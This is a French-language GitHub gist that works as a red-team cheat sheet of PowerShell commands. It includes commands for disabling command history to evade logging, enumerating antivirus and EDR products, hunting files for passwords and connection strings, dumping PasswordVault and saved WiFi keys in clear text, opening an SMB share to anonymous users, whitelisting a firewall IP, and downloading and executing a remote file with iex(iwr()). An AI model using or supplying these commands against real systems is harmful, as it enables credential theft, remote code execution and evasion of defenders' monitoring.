Skip to content

Instantly share code, notes, and snippets.

@Twibow

Twibow/txt, ps1

Created April 12, 2023 20:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Twibow/74e894cae062ea2aa7e9a4ee37b3c746 to your computer and use it in GitHub Desktop.
Save Twibow/74e894cae062ea2aa7e9a4ee37b3c746 to your computer and use it in GitHub Desktop.
Download ZIP
Commandes Powershell utiles en Pentest / Red Team
Raw
txt, ps1
------------------------------------------------------------------------
..:: Quelques commandes Powershell - Usefull for Pentest & Red Team ::..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----------------------------------------------------------------------------------------
## Désactiver les logs (historisation) des commandes de la session Powershell en cours ##
-----------------------------------------------------------------------------------------
PS C:\Users\Thibow> Set-PSReadlineOption –HistorySaveStyle SaveNothing
Ou ...
PS C:\Users\Thibow> Remove-Module PSReadline
---------------------------------------------------------------
## Lister les AV / EDR en cours d'execution sur le endxpoint ##
---------------------------------------------------------------
PS C:\Users\Thibow> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
---------------------------------------------------------------------
## Rechercher silencieuseuement des documents de manière récursive ##
---------------------------------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
----------------------------------------------------------------------------
## Recherche des fichier de configuration contenant le mot clé "password" ##
----------------------------------------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
-------------------------------------------------------------------------------------
## Recherche de mots de passe dans les fichiers de configuration de base de donnée ##
-------------------------------------------------------------------------------------
PS C:\Users\Thibow> gci C:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
-----------------------------------------------------------
## Extraction de mot de passe dans Windows PasswordVault ##
-----------------------------------------------------------
PS C:\Users\Thibow> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }
-------------------------------------------------------------------
## Récupération des mot de passe WiFi enregistré sur le endpoint ##
-------------------------------------------------------------------
# Version FR #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Contenu de la clé\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
# Versoin EN #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
------------------------------------------------
## Modifier la MAC Adresse de sa carte réseau ##
------------------------------------------------
PS C:\Users\Thibow> Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
-------------------------------------------------------------
## Créer un répertoire partagé SMB accessible en everybody ##
-------------------------------------------------------------
PS C:\Users\Thibow> new-item "C:\Users\prout\" -itemtype directory
PS C:\Users\Thibow> New-SmbShare -Name "sharedir" -Path "C:\Users\prout\" -FullAccess "Everyone","Guests","Anonymous Logon"
-------------------------------------------------------------------------------------------------
## Whitelister une adresse IP sur le firewall local Windows (autorisation pour tous les ports) ##
-------------------------------------------------------------------------------------------------
PS C:\Users\Thibow> New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123
// Supprimer la règle ::
PS C:\Users\Thibow> Remove-NetFirewallRule -DisplayName "pentest"
----------------------------------------------
## Téléchargement et éxécution d'un fichier ##
----------------------------------------------
PS C:\Users\Thibow> iex(iwr("https://UrlDuFichier/123.exe"))
iwr == Invoke-WebRequest
iex == Invoke-Expression
-----------------------------------------------
## Récupérer le SID de l'utilisateur courant ##
-----------------------------------------------
PS C:\Users\Thibow> ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value
##
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment